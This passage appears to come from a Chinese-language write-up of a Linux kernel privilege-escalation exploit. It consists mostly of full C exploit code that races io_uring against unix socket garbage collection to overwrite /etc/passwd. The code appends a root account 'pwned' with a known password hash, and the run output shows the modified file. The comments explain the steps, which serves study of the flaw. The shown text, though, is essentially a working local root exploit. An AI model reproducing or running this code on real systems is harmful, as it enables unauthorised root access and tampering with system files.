for(offset = 0; offset < 0x80000 / 20; offset++) {
void *r = mmap((void *)(addr + offset * 0x1000), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r < 0) {
printf("[!] allocate failed at 0x%x\n", offset);
}
}

assert(offset > 0);
void *mem = (void *)(addr);
memcpy(mem, "hhhhh", 5);

struct iovec iov[20];

for (int i = 0; i < 20; i++) {
iov[i].iov_base = mem;
iov[i].iov_len = (offset - 1) * 0x1000;
}

*start_write = 1;

if (writev(fd, iov, 20) < 0) { /* 大量写入/tmp/rwA(持有inode锁) */
perror("[!] slow write");
}

RESET;
printf("\n[+] write done!\n");
*start_write = -1;
exit(0);
}

struct iovec iov[12];

int sendfd(int s, int fd){
struct msghdr msg;
char buf[4096];
struct cmsghdr *cmsg;
int fds[1] = { fd };
memset(&msg, 0, sizeof(msg));
memset(buf, 0, sizeof(buf));
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(fds));
memcpy(CMSG_DATA(cmsg), fds, sizeof(fds));
msg.msg_controllen = CMSG_SPACE(sizeof(fds));
sendmsg(s, &msg, 0);
}

int io_uring_setup(int r, void *p){
return syscall(__NR_io_uring_setup, r, p);
}

int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig){
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);
}

int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args){
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring){
struct io_uring_sqe *sqe;
io_uring_queue_mmap(fd, params, ring); /* 通过mmap建立映射关系 */
sqe = io_uring_get_sqe(ring); /* 获取可用SQE */
sqe->opcode = IORING_OP_WRITEV; /* 标记批量写请求(后续需使用IOVEC) */
sqe->fd = 1; /* 要执行IO的文件描述符 | skb->fp->fp中对应文件描述符的下标 */
sqe->addr = (long) iov; /* 指向缓冲区 | IOVEC的指针 */
sqe->len = 1; /* 缓冲区大小 | IOVEC数量 */
sqe->flags = IOSQE_FIXED_FILE; /* 设置了IOSQE_FIXED_FILE标志位后,这里的"sqe->fd=1"其实代表了skb->fp->fp[1],也就是用户传入的rfd[1]("/tmp/rwA"的文件描述符) */
}

int main(int argc, char **argv){
pthread_t t;
struct io_uring ring;
int fd;
struct io_uring_params *params;
int rfd[3];
int s[2];
int target_fd;
start_write = (int *)mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); /* 用于反应两个线程的状态 */
assert(start_write != (int *)-1);

*start_write = 0;

// Password for new root user --> "lol"
iov[0].iov_base = "pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh\n";
iov[0].iov_len = 59;
iov[1].iov_base = "hello, world!\n";
iov[1].iov_len = 14;
iov[2].iov_base = "hello, world!\n";
iov[2].iov_len = 14;
iov[10].iov_base = "hello, world!\n";
iov[10].iov_len = 14;
iov[11].iov_base = "hello, world!\n";
iov[11].iov_len = 14;

socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* SOCK_DGRAM表示UDP(用于在网络上发广播信息) */

params = malloc(sizeof(*params));
memset(params, 0, sizeof(*params));
params->flags = IORING_SETUP_SQPOLL; /* 自动取检查任务队列里是否有新任务并去完成(不需要主动调用io_uring_enter) */

fd = io_uring_setup(32, params); /* 初始化io_uring */
rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644);

io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* IORING_REGISTER_FILES允许将若干文件描述符注册进入io_uring */
close(rfd[1]);

sendfd(s[0], fd);
close(s[0]);
close(s[1]);
printf("[+] Creating thread\n");
pthread_create(&t, NULL, slow_write, NULL);
sleep(1);
prepare_request(fd, params, &ring);
printf("[+] Waiting for the other thread to get lock on file\n");
while(*start_write == 0){
SPIN
}

printf("[+] Thread 1 got inode lock!\n");
printf("[+] Submitting io_uring request\n");

io_uring_submit(&ring); /* 提交SQE请求,底层还是会调用io_uring_enter */

sleep(2);

printf("[+] Closing io_uring\n");

io_uring_queue_exit(&ring);

if(!fork()){
printf("[+] Triggering unix_gc...\n");
close(socket(AF_UNIX, SOCK_DGRAM, 0));
printf("unix_gc done!\n");
exit(0);
}

sleep(2);
printf("[+] Opening /etc/passwd in RDONLY...\n");

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT); /* 不设置页缓存,提升效率 */
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

printf("[+] Waiting for slow_write end...\n");
while(*start_write == 1){
SPIN
}
printf("\n");
sleep(5);
printf("[+] Closing fd\n");
close(fd);
printf("[+] Sleeping before exit ..\n");
sleep(20);
return 0;
}

最终效果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/ $ ./exp
[+] Creating thread
[+] Start slow write to get the lock
[+] Waiting for the other thread to get lock on file
[+] Thread 1 got inode lock!
[+] Submitting io_uring request
[+] Closing io_uring
[+] Triggering unix_gc...
unix_gc done!
[+] Opening /etc/passwd in RDONLY...
[+] Waiting for slow_write end...
[|]
[+] write done!
[|]
[|]
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:65534:65534:nobody:/home:/bin/false
pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh